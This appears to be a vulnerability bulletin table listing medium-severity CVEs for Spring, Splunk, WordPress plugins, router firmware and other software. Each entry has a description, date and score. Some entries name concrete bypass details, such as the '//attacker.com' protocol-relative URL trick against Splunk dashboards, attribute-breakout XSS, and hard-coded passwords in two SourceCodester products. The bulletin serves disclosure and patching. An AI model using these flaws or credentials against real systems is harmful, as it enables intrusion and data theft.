| SolarWinds--Observability Self-Hosted | A vulnerability exists in which an attacker can provide a crafted external URL that may redirect a user to an unintended website. | 2026-06-09 | 4.8 | CVE-2026-28301 |
| solidtime-io--solidtime | Solidtime is an open-source time-tracking app. Prior to version 0.12.2, Solidtime defines explicit invitations:view and members:view permissions that gate the official invitations and members API. The Jetstream web team page authorizes access with only belongsToTeam() and then loads and serializes all pending invitation emails as well as members into Inertia props. Any employee who belongs to the organization can read pending invitation email addresses and members through the serialized Inertia data in the team page body, even though the same user is forbidden from the API. This issue has been patched in version 0.12.2. | 2026-06-12 | 4.3 | CVE-2026-47236 |
| SourceCodester--Barangay Resident Profiling and Information Management System | A vulnerability has been found in SourceCodester Barangay Resident Profiling and Information Management System 1.0. The impacted element is an unknown function of the file passsword_reset.php of the component Password Reset Handler. Such manipulation of the argument new_password with the input password123 leads to use of hard-coded password. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. | 2026-06-08 | 5.3 | CVE-2026-11515 |
| SourceCodester--CET Automated Grading System with AI Predictive Analytics | A vulnerability has been found in SourceCodester CET Automated Grading System with AI Predictive Analytics 1.0. The impacted element is an unknown function of the file /index.php. The manipulation of the argument action leads to cross site scripting. The attack is possible to be carried out remotely. The exploit has been disclosed to the public and may be used. | 2026-06-13 | 4.3 | CVE-2026-12176 |
| SourceCodester--Inventory System | A security flaw has been discovered in SourceCodester Inventory System 1.0. Affected by this vulnerability is an unknown functionality of the file /Product_Inventory/api/users_handler.php of the component Account Creation Handler. The manipulation of the argument ROLE results in improper authorization. The attack may be performed from remote. The exploit has been released to the public and may be used for attacks. | 2026-06-08 | 6.3 | CVE-2026-11519 |
| SourceCodester--Inventory System | A vulnerability was identified in SourceCodester Inventory System 1.0. Affected is an unknown function of the file /users.php of the component User Management Page. The manipulation of the argument fullname/username leads to cross site scripting. The attack is possible to be carried out remotely. The exploit is publicly available and might be used. | 2026-06-08 | 4.3 | CVE-2026-11518 |
| SourceCodester--Onlne Examination & Learning Management System | A vulnerability has been found in SourceCodester Onlne Examination & Learning Management System and Syllabus-aligned Learning Management and Examination System 1.0. Affected by this issue is some unknown functionality of the file import_users.php. The manipulation of the argument raw_password with the input CICT_2026 leads to use of hard-coded password. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. This product is distributed under two entirely different names. | 2026-06-08 | 5.3 | CVE-2026-11552 |
| Sparkle WP--MetroStore | Missing Authorization vulnerability in Sparkle WP MetroStore metrostore allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects MetroStore: from n/a through 1.3.2. | 2026-06-11 | 4.3 | CVE-2023-32959 |
| spearman--unbounded-spsc | unbounded_spsc is an "unbounded" extension of bounded_spsc_queue. In versions 0.2.0 and prior, sender::send pointer-as-value transmute causes OOB read and fake-Arc drop under TX/RX race. At time of publication, there are no publicly available patches. | 2026-06-12 | 5.8 | CVE-2026-46690 |
| Splunk--Splunk Enterprise | In Splunk Enterprise versions below 10.2.4, 10.0.7, 9.4.12, and 9.3.13, and Splunk Cloud Platform versions below 10.3.2512.13, 10.2.2510.15, 10.1.2507.23, and 9.3.2411.132, a low-privileged user that does not hold the 'admin' or 'power' Splunk roles could craft a malicious classic dashboard that exfiltrates sensitive data to an external server when a higher-privileged user views it, bypassing the external content restriction through a Cascading Style Sheets (CSS) injection. The Trusted Domains security check does not fully validate inline style attribute values, which can allow for outbound requests to untrusted domains and credential exfiltration when a victim views a crafted dashboard. | 2026-06-10 | 5.7 | CVE-2026-20254 |
| Splunk--Splunk Enterprise | In Splunk Enterprise versions below 10.2.4, 10.0.7, 9.4.12, and 9.3.13, and Splunk Cloud Platform versions below 10.3.2512.13, 10.2.2510.15, 10.1.2507.23, and 9.3.2411.132, a low-privileged user that does not hold the "admin" or "power" Splunk roles could craft a malicious classic dashboard that exfiltrates sensitive data to an external server. The vulnerability exists because URL validation on the external content dialog is incomplete, which can allow for requests to untrusted domains when a user interacts with a crafted dashboard. | 2026-06-10 | 5.7 | CVE-2026-20255 |
| Splunk--Splunk Enterprise | In Splunk Enterprise versions below 10.2.4, 10.0.7, 9.4.12, and 9.3.13, and Splunk Cloud Platform versions below 10.3.2512.13, 10.2.2510.15, 10.1.2507.23, and 9.3.2411.132, a low-privileged user that does not hold the 'admin' or 'power' Splunk roles could cause data exfiltration through classic dashboards by redirecting a victim to an external site using a protocol-relative URL in a drill-down link. The vulnerability exists because the URL classifier in classic dashboards only recognizes `http://` and `https://` schemes when checking for external URLs. Protocol-relative URLs such as `//attacker.com` bypass this check entirely, and Splunk Web does not show the external-navigation warning dialog to the victim. | 2026-06-10 | 5.7 | CVE-2026-20256 |
| Splunk--Splunk Enterprise | In Splunk Enterprise versions below 10.2.4, 10.0.7, 9.4.12, and 9.3.13, and Splunk Cloud Platform versions below 10.3.2512.13, 10.2.2510.15, 10.1.2507.23, and 9.3.2411.132, a low-privileged user that does not hold the "admin" or "power" Splunk roles could craft a classic dashboard that exfiltrates sensitive data from the browser of a higher-privileged user who views it. The exfiltration is possible because classic dashboard panels do not fully validate style attribute values, which can allow for requests to reach external domains outside the configured Trusted Domains List. The vulnerability requires the attacker to phish the victim by tricking them into initiating a request within their browser. The low-privileged user should not be able to exploit the vulnerability at will. | 2026-06-10 | 5.7 | CVE-2026-20257 |
| Splunk--Splunk Enterprise | In Splunk Enterprise versions below 10.2.4 and 10.0.7, and Splunk Cloud Platform versions below 10.4.2604.0, 10.3.2512.12, 10.2.2510.15, 10.1.2507.23, 10.0.2503.14, and 9.3.2411.131, a user who holds a Splunk role that contains the high-privilege capability `edit_saved_search_owner` could reassign saved search ownership to users outside their authorized scope. The ownership reassignment endpoint lacks access control. | 2026-06-10 | 5.5 | CVE-2026-20259 |
| Splunk--Splunk SOAR | In Splunk SOAR (Security Orchestration, Automation, and Response) versions below 8.5.0, an unauthenticated attacker could inject American National Standards Institute (ANSI) escape codes into SOAR application log files through specially crafted HTTP request paths, which a terminal emulator might interpret when an administrator views the logs.<br><br>The injection is possible because SOAR does not strip control characters from HTTP request paths before writing them to application logs. | 2026-06-10 | 4.3 | CVE-2026-20260 |
| Spring--Reactor Netty | In specific scenarios involving HTTP redirects from a secure to an insecure endpoint, the Reactor Netty HTTP client may leak credentials. In order for this to happen, the HTTP client must have been explicitly configured to follow redirects. Affected versions: Reactor Netty 1.0.0 through 1.0.51; 1.1.0 through 1.1.35; 1.2.0 through 1.2.17; 1.3.0 through 1.3.5. | 2026-06-09 | 6.1 | CVE-2026-41715 |
| Spring--Spring AMQP | Correlation IDs for replies in the RabbitTemplate.sendAndReceive() with the fixed reply queue are predictable due to an internal simple counter. Affected versions: Spring AMQP 4.0.0 through 4.0.3; 3.2.0 through 3.2.10; 3.1.0 through 3.1.15; 2.4.0 through 2.4.17. | 2026-06-09 | 4.4 | CVE-2026-41701 |
| Spring--Spring AMQP | Applications that configure their broker connection via RabbitConnectionFactoryBean.setUri("amqps://...") without also calling setUseSSL(true) get TLS encryption with no certificate validation and no hostname verification. Affected versions: Spring AMQP 4.0.0 through 4.0.3; 3.2.0 through 3.2.10; 3.1.0 through 3.1.15; 2.4.0 through 2.4.17. | 2026-06-09 | 4 | CVE-2026-41714 |
| Spring--Spring Boot | Spring Boot's Mail auto-configuration does not enable hostname verification. Applications that set the relevant JavaMail property, such as spring.mail.properties.mail.smtp.ssl.checkserveridentity=true, are not affected. Affected versions: Spring Boot 4.0.0 through 4.0.6; 3.5.0 through 3.5.14; 3.4.0 through 3.4.16. | 2026-06-11 | 5 | CVE-2026-40992 |
| Spring--Spring Boot | Spring Boot's ArtemisEmbeddedConfigurationFactory uses a fixed, static path for the embedded Artemis message broker's data directory when no explicit path is configured. A local attacker on the same host can pre-create this predictable directory or place a symlink before the application starts. Affected versions: Spring Boot 4.0.0 through 4.0.6; 3.5.0 through 3.5.14; 3.4.0 through 3.4.16; 3.3.0 through 3.3.19; 2.7.0 through 2.7.33. | 2026-06-11 | 5.3 | CVE-2026-41001 |
| Spring--Spring Data Commons | Applications using Spring Data Commons may be vulnerable to a Denial of Service (DoS) attack leading to a StackOverflowException when parsing Sort parameters. Affected versions: Spring Data Commons 4.0.0 through 4.0.5; 3.5.0 through 3.5.11; 3.4.0 through 3.4.14; 3.3.0 through 3.3.16; 3.2.0 through 3.2.15; 3.1.0 through 3.1.14; 3.0.0 through 3.0.15; 2.7.0 through 2.7.19. | 2026-06-09 | 5.9 | CVE-2026-41711 |
| Spring--Spring Data Commons | Spring Data Commons contains a vulnerability that can lead to a Denial of Service (DoS) condition if Spring Data Web Support is enabled in conjunction with a Controller method using @ProjectedPayload, when an attacker sends a specially crafted HTTP request that causes the application to allocate lots of memory. Affected versions: Spring Data Commons 4.0.0 through 4.0.5; 3.5.0 through 3.5.11; 3.4.0 through 3.4.14; 3.3.0 through 3.3.16; 3.2.0 through 3.2.15; 3.1.0 through 3.1.14; 3.0.0 through 3.0.15; 2.7.0 through 2.7.19. | 2026-06-09 | 5.9 | CVE-2026-41721 |
| Spring--Spring Data KeyValue | A SpEL Injection vulnerability exists in the Spring Data KeyValue if unsanitized user input is passed as Sort into a repository query method that delegates evaluation to the SpelPropertyComparator. Affected versions: Spring Data KeyValue / Spring Data Redis 4.0.0 through 4.0.5; 3.5.0 through 3.5.11; 3.4.0 through 3.4.14; 3.3.0 through 3.3.16; 3.2.0 through 3.2.15; 3.1.0 through 3.1.14; 3.0.0 through 3.0.15; 2.7.0 through 2.7.19. | 2026-06-09 | 6.4 | CVE-2026-41719 |
| Spring--Spring Data MongoDB | Spring Data MongoDB repository query methods annotated with @Query that use regex parameter binding perform insufficient validation of the bound parameter. An attacker can supply a crafted string to break out of the intended regular expression quoting. Affected versions: Spring Data MongoDB 5.0.0 through 5.0.5; 4.5.0 through 4.5.11; 4.4.0 through 4.4.14; 4.3.0 through 4.3.16; 4.2.0 through 4.2.15; 4.1.0 through 4.1.14; 4.0.0 through 4.0.15; 3.4.0 through 3.4.19. | 2026-06-09 | 5.9 | CVE-2026-41696 |
| Spring--Spring Data Relational | Spring Data Relational does not properly escape binding values of externally-controlled input when using StringMatcher (STARTING, ENDING, or CONTAINING) in Query By Example (QBE). An attacker can supply wildcard characters to perform boolean-based blind data inference. Affected versions: Spring Data Relational/JDBC/R2DBC 4.0.0 through 4.0.5; 3.5.0 through 3.5.11; 3.4.0 through 3.4.14; 3.3.0 through 3.3.16; 3.2.0 through 3.2.15; 3.1.0 through 3.1.14; 3.0.0 through 3.0.15; 2.4.0 through 2.4.19. | 2026-06-09 | 4.8 | CVE-2026-41697 |
| Spring--Spring Data REST | Spring Data REST serializes the full exception cause chain into HTTP error response bodies, potentially exposing persistence-layer internals to HTTP clients. Affected versions: Spring Data REST 3.7.0 through 3.7.19; 4.3.0 through 4.3.16; 4.4.0 through 4.4.14; 4.5.0 through 4.5.11; 5.0.0 through 5.0.5. | 2026-06-09 | 5.3 | CVE-2026-41730 |
| Spring--Spring Data REST | Spring Data REST's Querydsl integration accepts arbitrary persistent property paths as request-parameter filter keys and does not consider Jackson customizations before handing them to Querydsl. Affected versions: Spring Data REST 3.7.0 through 3.7.19; 4.3.0 through 4.3.16; 4.4.0 through 4.4.14; 4.5.0 through 4.5.11; 5.0.0 through 5.0.5. | 2026-06-09 | 5.3 | CVE-2026-41837 |
| Spring--Spring for Apache Kafka | When an application opts into DelegatingDeserializer, a producer can grow the consumer's heap without bound by sending records with unique random spring.kafka.serialization.selector header values, eventually causing GC thrash and OutOfMemoryError. Affected versions: Spring for Apache Kafka 4.0.0 through 4.0.5; 3.3.0 through 3.3.15; 3.2.0 through 3.2.13; 2.9.0 through 2.9.13; 2.8.0 through 2.8.11. | 2026-06-09 | 6.5 | CVE-2026-41726 |
| Spring--Spring for Apache Kafka | Spring Kafka's retry topic infrastructure did not sufficiently validate user-controlled header values before acting on them. A producer could send a record with a crafted retry_topic-attempts header to supply an out-of-range attempt count and cause the retry topic router to misidentify where the message was in the retry sequence. Affected versions: Spring for Apache Kafka 4.0.0 through 4.0.5; 3.3.0 through 3.3.15; 3.2.0 through 3.2.13; 2.9.0 through 2.9.13; 2.8.0 through 2.8.11. | 2026-06-09 | 6.5 | CVE-2026-41727 |
| Spring--Spring Framework | Spring WebFlux applications are vulnerable to Denial of Service (DoS) attacks when processing multipart requests. Affected versions: Spring Framework 7.0.0 through 7.0.7; 6.2.0 through 6.2.18; 6.1.0 through 6.1.27; 5.3.0 through 5.3.48. | 2026-06-09 | 5.9 | CVE-2026-41840 |
| Spring--Spring Framework | Spring MVC and WebFlux applications are vulnerable to Information Disclosure attacks when resolving static resources. Affected versions: Spring Framework 7.0.0 through 7.0.7; 6.2.0 through 6.2.18; 6.1.0 through 6.1.27; 5.3.0 through 5.3.48. | 2026-06-09 | 5.9 | CVE-2026-41841 |
| Spring--Spring Framework | Spring MVC and WebFlux applications are vulnerable to Path Traversal attacks when resolving static resources. Affected versions: Spring Framework 7.0.0 through 7.0.7; 6.2.0 through 6.2.18; 6.1.0 through 6.1.27; 5.3.0 through 5.3.48. | 2026-06-09 | 5.9 | CVE-2026-41843 |
| Spring--Spring Framework | Spring MVC applications which accept user-supplied values in the cssClass, cssErrorClass, or cssStyle attributes of JSP form tags allow arbitrary HTML/JavaScript code injection, potentially resulting in a cross-site scripting (XSS) vulnerability. Affected versions: Spring Framework 7.0.0 through 7.0.7; 6.2.0 through 6.2.18; 6.1.0 through 6.1.27; 5.3.0 through 5.3.48. | 2026-06-09 | 5.9 | CVE-2026-41846 |
| Spring--Spring Framework | Applications which accept user-supplied Spring Expression Language (SpEL) expressions may be vulnerable to a Denial of Service (DoS) attack if the evaluation of a SpEL expression triggers unbounded cache growth. Affected versions: Spring Framework 7.0.0 through 7.0.7; 6.2.0 through 6.2.18; 6.1.0 through 6.1.27; 5.3.0 through 5.3.48. | 2026-06-09 | 5.3 | CVE-2026-41851 |
| Spring--Spring Framework | Spring MVC and WebFlux applications are vulnerable to Multipart request smuggling attacks. Affected versions: Spring Framework 7.0.0 through 7.0.7; 6.2.0 through 6.2.18; 6.1.0 through 6.1.27; 5.3.0 through 5.3.48. | 2026-06-09 | 5.3 | CVE-2026-41853 |
| Spring--Spring Framework | IDs for WebSocket sessions in the spring-websocket module are not cryptographically unpredictable, which may be possible to exploit in combination with inadequate authorization rules. Affected versions: Spring Framework 7.0.0 through 7.0.7; 6.2.0 through 6.2.18; 6.1.0 through 6.1.27; 5.3.0 through 5.3.48. | 2026-06-09 | 4.8 | CVE-2026-41838 |
| Spring--Spring Framework | A WebFlux application with a compromised subdomain (for example, compromised via cross-site scripting (XSS)) is vulnerable to an escalation attack exchanging a known session ID for that of an authenticated user. Affected versions: Spring Framework 7.0.0 through 7.0.7; 6.2.0 through 6.2.18; 6.1.0 through 6.1.27; 5.3.0 through 5.3.48. | 2026-06-09 | 4.2 | CVE-2026-41839 |
| Spring--Spring Framework | A Spring MVC or Spring WebFlux application which configures a mapping for "/**" where the view name is not explicitly specified allows an attacker to craft a link resulting in a 302 redirect to an arbitrary external host via the redirect: prefix. Affected versions: Spring Framework 7.0.0 through 7.0.7; 6.2.0 through 6.2.18; 6.1.0 through 6.1.27; 5.3.0 through 5.3.48. | 2026-06-09 | 4.2 | CVE-2026-41844 |
| Spring--Spring Framework | Spring WebFlux applications may be vulnerable to a security bypass when using the Kotlin Router DSL. Affected versions: Spring Framework 5.3.0 through 5.3.48. | 2026-06-09 | 4.8 | CVE-2026-41847 |
| Spring--Spring Framework | Due to incorrect host parsing, applications that rely on UriComponentsBuilder to parse and validate an externally provided URL string may be exposed to a server-side request forgery (SSRF) attack. Affected versions: Spring Framework 7.0.0 through 7.0.7; 6.2.0 through 6.2.18. | 2026-06-09 | 4.2 | CVE-2026-41854 |
| Spring--Spring REST Docs | When using spring-restdocs-webtestclient or spring-restdocs-restassured to document a remote API accessed over HTTP, an attacker who compromises the API or tricks the user into documenting a malicious API can perform an XXE injection attack when the documentation-generating tests are next executed. Affected versions: Spring REST Docs 4.0.0; 3.0.0 through 3.0.5; 2.0.0.RELEASE through 2.0.8.RELEASE. | 2026-06-09 | 5.9 | CVE-2026-40991 |
| Spring--Spring Retry | An attacker can craft a large number of unique requests that trigger a failure, exhausting the capacity of the application-wide stateful retry cache. Once the cache is full, it permanently rejects any further updates, causing all later stateful retries and circuit breakers in the application to fail. Affected versions: Spring Retry 2.0.0 through 2.0.12; 1.3.0 through 1.3.4. | 2026-06-09 | 5.9 | CVE-2026-41710 |
| Spring--Spring Security | Spring Security Authorization Server's authorization endpoint performs insufficient validation of the request_uri parameter. An attacker can craft a malicious authorization request containing an invalid request_uri and an arbitrary, unvalidated redirect_uri, which can lead to an Open Redirect vulnerability. Affected versions: Spring Security 7.0.0 through 7.0.5. Spring Authorization Server 1.5.0 through 1.5.7. | 2026-06-09 | 6.1 | CVE-2026-41008 |
| Spring--Spring Security | Spring Security's CookieRequestCache and CookieServerRequestCache store the pre-authentication request URL in a browser cookie so that users can be redirected back to their intended destination after a successful login. In affected versions, the full absolute URL is stored in the cookie and is used without validation as the post-login redirect target. Affected versions: Spring Security 5.7.0 through 5.7.23; 5.8.0 through 5.8.25; 6.3.0 through 6.3.16; 6.4.0 through 6.4.16; 6.5.0 through 6.5.10; 7.0.0 through 7.0.5. | 2026-06-09 | 6.1 | CVE-2026-41706 |
| Spring--Spring Security | SubjectDnX509PrincipalExtractor does not correctly handle certain malformed X.509 certificate CN values, which can lead to reading the wrong value for the username. In a carefully crafted certificate, this can lead to an attacker impersonating another user. Affected versions: Spring Security 5.7.0 through 5.7.24; 5.8.0 through 5.8.26; 6.3.0 through 6.3.17; 6.4.0 through 6.4.17; 6.5.0 through 6.5.10. | 2026-06-09 | 6.8 | CVE-2026-47838 |
| Spring--Spring Web Flow | Applications that configure the WebFlowELExpressionParser are vulnerable to the use of malicious Unified EL expressions. Affected versions: Spring Web Flow 4.0.0; 3.0.0 through 3.0.1; 2.5.0 through 2.5.1. | 2026-06-11 | 6.4 | CVE-2026-40985 |
| Spring--Spring Web Flow | Spring Web Flow's JavaScript RemotingHandler renders the body of an error response as HTML even when the response is not "text/html", which can result in a scripting attack in the user's browser if the error response from the server contains error details with input reflected from an attacker. Affected versions: Spring Web Flow 4.0.0; 3.0.0 through 3.0.1; 2.5.0 through 2.5.1. | 2026-06-11 | 4.8 | CVE-2026-40986 |
| Spring--Spring Web Services | X509AuthenticationProvider could issue a fully authenticated X509AuthenticationToken when a presented certificate mapped to UserDetails, without applying Spring Security's standard account lifecycle checks (disabled, locked, expired, or credentials-expired accounts). Affected versions: Spring Web Services 5.0.0 through 5.0.1; 4.1.0 through 4.1.3; 4.0.0 through 4.0.18; 3.1.0 through 3.1.8. | 2026-06-11 | 5.4 | CVE-2026-40995 |
| Spring--Spring Web Services | Several Spring WS integration paths with Spring Security could surface detailed account state (for example locked or disabled user semantics) to remote SOAP clients through exception messages or callback outcomes, instead of failing with generic authentication errors. That behavior assists remote attackers in distinguishing valid accounts from invalid ones and inferring lifecycle state. Affected versions: Spring Web Services 5.0.0 through 5.0.1; 4.1.0 through 4.1.3; 4.0.0 through 4.0.18; 3.1.0 through 3.1.8. | 2026-06-11 | 5.3 | CVE-2026-40997 |
| Spring--Spring Web Services | Wss4jSecurityInterceptor defaulted allowRSA15KeyTransportAlgorithm to true, overriding Apache WSS4J's safer default for validation RequestData. Inbound WS-Security decryption could therefore accept RSA PKCS#1 v1.5 (rsa-1_5) encrypted key material unless operators explicitly reconfigured the flag. Affected versions: Spring Web Services 5.0.0 through 5.0.1; 4.1.0 through 4.1.3; 4.0.0 through 4.0.18; 3.1.0 through 3.1.8. | 2026-06-11 | 4.8 | CVE-2026-40996 |
| stefanbohacek--fediverse-embeds-wordpress-plugin | Fediverse Embeds embeds fediverse posts on WordPress sites. Prior to version 1.5.9, Fediverse Embeds registered the unauthenticated AJAX action wp_ajax_nopriv_ftf_get_site_info (includes/Site_Info.php) that verified a nonce ftf-fediverse-embeds-nonce and then called file_get_html($site_url) on the attacker-supplied URL. The same nonce was enqueued onto every public page containing a fediverse embed (via includes/Enqueue_Assets.php lines 41-46 + includes/Helpers.php lines 64-83), so the nonce gate was not an authentication boundary; any visitor of a public post with an embed could grab it and reuse it. This issue has been patched in version 1.5.9. | 2026-06-11 | 5.3 | CVE-2026-46698 |
| steipete--CodexBar | CodexBar before 0.33.0 contains a credential forwarding vulnerability that allows network-adjacent attackers to intercept sensitive credentials by issuing cross-origin or HTTP-downgrade redirects to the shared ProviderHTTPClient transport. Attackers can redirect credentialed provider requests carrying browser cookies, bearer tokens, or API keys to an unintended host, port, or plaintext HTTP destination to capture those credentials. | 2026-06-11 | 5.3 | CVE-2026-49949 |
| steipete--summarize | Summarize before 0.17.0 contains a resource exhaustion vulnerability that allows remote attackers to cause disk exhaustion by serving media responses that bypass the enforced size limit through missing or misreported Content-Length headers, chunked transfer encoding, or failed HEAD requests. Attackers who control a podcast feed or media URL can stream an unbounded response to local storage via the temp-file download path, exhausting disk or system resources on the host running the CLI. | 2026-06-11 | 4.3 | CVE-2026-53781 |
| subzeroid--aiograpi | aiograpi is an asynchronous Instagram API for Python. aiograpi versions before 0.9.10 accepted server-supplied signup challenge paths and used them to build request URLs before validating that the paths were relative Instagram API paths. If an attacker can influence a challenge response, for example through a local network, DNS, or proxy compromise, challenge handling requests could be sent outside the intended Instagram host with the client's existing session headers. Version 0.9.10 validates challenge paths before building URLs, solving captcha challenges, or submitting phone/SMS challenge forms. | 2026-06-11 | 6.5 | CVE-2026-47157 |
| Systerel--S2OPC | The check for certificate revocation only considers the first matching CRL and ignores other valid CRLs of the same CA in the CycloneCrypto cryptographic wrapper of the S2OPC library. It might allow a connection between an OPC UA client and server using a revoked certificate. | 2026-06-09 | 5.6 | CVE-2026-6899 |
| techjewel--WP GDPR Cookie Consent | The WP GDPR Cookie Consent plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'ninja_gdpr_ajax_actions' AJAX action in versions up to, and including, 1.0.0. This is due to missing capability and nonce checks on the handleAjaxCalls() function, combined with insufficient input sanitization on the gdprConfig values and missing output escaping in the generateCSS() function which echoes stored configuration values directly into a <style> block rendered on wp_head. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-06-09 | 6.4 | CVE-2026-8977 |
| TemplateHouse--Soledad | Missing Authorization vulnerability in TemplateHouse Soledad allows Accessing Functionality Not Properly Constrained by ACLs. This issue affects Soledad: from n/a through 8.2.5. | 2026-06-11 | 5.4 | CVE-2022-42479 |
| Tenda--AC15 | A weakness has been identified in Tenda AC15 15.03.05.19. The impacted element is an unknown function of the file /etc_ro/smb.conf of the component Samba. Executing a manipulation can lead to weak password requirements. The attack is only possible within the local network. A high complexity level is associated with this attack. The exploitability is regarded as difficult. The exploit has been made available to the public and could be used for attacks. | 2026-06-08 | 5 | CVE-2026-11493 |
| ThemeHunk--Contact Form & Lead Form Elementor Builder | Missing Authorization vulnerability in ThemeHunk Contact Form & Lead Form Elementor Builder allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Contact Form & Lead Form Elementor Builder: from n/a through 1.8.4. | 2026-06-11 | 5.4 | CVE-2023-25969 |
| tierrainnovation--AJAX Report Comments | The AJAX Report Comments plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.0.4. This is due to missing or incorrect nonce validation on the rc_options_page function. This makes it possible for unauthenticated attackers to modify plugin settings including link text and markup, success/failure/already-reported messages, comment threshold, cookie duration, reporter-comment toggle, and notification email address, subject, and message body via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-06-09 | 4.3 | CVE-2026-8902 |
| tigroumeow--Meow Gallery | The Meow Gallery plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the REST API endpoint /wp-json/meow-gallery/v1/save_shortcode in all versions up to, and including, 5.4.4. This makes it possible for authenticated attackers, with Author-level access and above, to arbitrarily create or overwrite existing gallery shortcode records by supplying a user-controlled id value. The endpoint performs database update operations without verifying that the requesting user is authorized to modify the referenced gallery record or create their own. | 2026-06-13 | 4.3 | CVE-2026-1291 |
| tmux--tmux | A security vulnerability has been detected in tmux up to 3.6a. Affected is the function image_free of the file image.c. Such manipulation leads to use after free. Local access is required to approach this attack. This attack is characterized by high complexity. The exploitability is said to be difficult. The exploit has been disclosed publicly and may be used. Upgrading to version 3.7-rc is able to address this issue. The name of the patch is fc6d94a9f8a593bd8b7031650802084385d4ee03. The affected component should be upgraded. | 2026-06-09 | 4.5 | CVE-2026-11623 |
| TOTOLINK--AC1200 T8 | A security vulnerability has been detected in TOTOLINK AC1200 T8 4.1.5cu.8611. This affects an unknown function of the file /etc/vsftpd.conf of the component vsftpd. The manipulation leads to least privilege violation. The attack may be initiated remotely. The exploit has been disclosed publicly and may be used. | 2026-06-08 | 4.3 | CVE-2026-11494 |
| TOTOLINK--CP450 | A vulnerability was determined in TOTOLINK CP450 4.1.0cu.747. This vulnerability affects unknown code of the file /etc/vsftpd.conf of the component vsftpd. This manipulation causes least privilege violation. The attack may be initiated remotely. The exploit has been publicly disclosed and may be utilized. | 2026-06-08 | 4.3 | CVE-2026-11554 |
| TOTOLINK--EX200 | A security flaw has been discovered in TOTOLINK EX200 4.0.3c.7646. This affects an unknown function of the file /etc/vsftpd.conf of the component vsftpd. The manipulation results in least privilege violation. It is possible to launch the attack remotely. The exploit has been released to the public and may be used for attacks. | 2026-06-09 | 5.3 | CVE-2026-11620 |
| umbraco--Umbraco-CMS | Umbraco is an ASP.NET CMS. Prior to versions 13.14.0 and 17.4.0, some of the Surface Controllers that the CMS provides to support member-related operations fail to validate redirect URLs, making Razor templates that derive 'RedirectUrl' from user-controlled query parameters vulnerable to malicious redirect attacks. This issue has been patched in versions 13.14.0 and 17.4.0. | 2026-06-10 | 5.4 | CVE-2026-46616 |
| umbraco--Umbraco-CMS | Umbraco is an ASP.NET CMS. From version 14.0.0 to before version 17.4.0, authenticated users are able to inject HTML into an input field, which is rendered in the confirmation dialog without proper output encoding. This issue has been patched in version 17.4.0. | 2026-06-10 | 4.6 | CVE-2026-46609 |
| UTT--HiPER 2610G | A vulnerability was found in UTT HiPER 2610G up to 3.0.0-171107. This affects the function strcpy of the file /goform/formNatStaticMap. Performing a manipulation of the argument NatBinds results in buffer overflow. The exploit has been made public and could be used. | 2026-06-08 | 5.5 | CVE-2026-11516 |
| wealcoder--Animation Addons for Elementor GSAP Motion Elementor Addons & Website Templates | The Animation Addons for Elementor - GSAP Powered Elementor Addons & Website Templates plugin for WordPress is vulnerable to DOM-Based Stored Cross-Site Scripting via the multiple parameters in all versions up to, and including, 2.6.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-06-10 | 6.4 | CVE-2025-8444 |
| weaverlancegmailcom--jQuery Hover Footnotes | The jQuery Hover Footnotes plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Footnote Qualifier ('{{...}}' Syntax) in all versions up to, and including, 1.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The attribute-breakout payload (e.g., a double-quote followed by an event handler) contains no angle brackets and therefore bypasses WordPress core's wp_kses_post() filtering, which only strips disallowed HTML tags rather than sanitizing attribute contexts. | 2026-06-09 | 6.4 | CVE-2026-10738 |
| weaverlancegmailcom--jQuery Hover Footnotes | The jQuery Hover Footnotes plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.4. This is due to missing or incorrect nonce validation on the jqFootnotes_options_subpanel function. This makes it possible for unauthenticated attackers to update the plugin's settings with arbitrary values that, because option values such as jqfoot_anchor_open, jqfoot_anchor_close, and jqfoot_title are echoed unescaped into frontend page content, can be chained into persistent Cross-Site Scripting affecting all site visitors via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. Successful exploitation of the CSRF vulnerability can be chained into stored Cross-Site Scripting, as the overwritten option values are persisted via update_option() without sanitization and rendered unescaped on the frontend. | 2026-06-09 | 4.3 | CVE-2026-10553 |
| Weaviate--Weaviate | A vulnerability was identified in Weaviate up to 1.37.7. This vulnerability affects the function validateConfig of the file usecases/auth/authentication/apikey/client.go of the component Static API Key Handler. The manipulation of the argument StaticApiKey leads to authorization bypass. It is possible to initiate the attack remotely. The complexity of an attack is rather high. It is stated that the exploitability is difficult. The exploit is publicly available and might be used. Upgrading to version 1.38.0-rc.0 is able to resolve this issue. The identifier of the patch is 40f2cc32279f0f8a51016c3c6870a2c0c808e6c0. You should upgrade the affected component. | 2026-06-08 | 5 | CVE-2026-11500 |
| WeblateOrg--weblate | Weblate is a web based localization tool. From version 5.15 to before version 2026.6, Weblate's VCS_RESTRICT_PRIVATE did not properly account for some transitional IPv6 ranges, multicast addresses, or some semi-private IPv4 ranges, which allowed some addresses to bypass private range restrictions. This issue has been patched in version 2026.6. | 2026-06-10 | 5.9 | CVE-2026-50127 |
| WeblateOrg--weblate | Weblate is a web based localization tool. Prior to version 2026.5, Weblate's live search preview renders unit source and context as HTML without escaping. Any contributor whose content reaches those fields stores HTML and CSS that runs inside the authenticated editor of every user who runs a matching search. This issue has been patched in version 2026.5. | 2026-06-10 | 4.6 | CVE-2026-45106 |
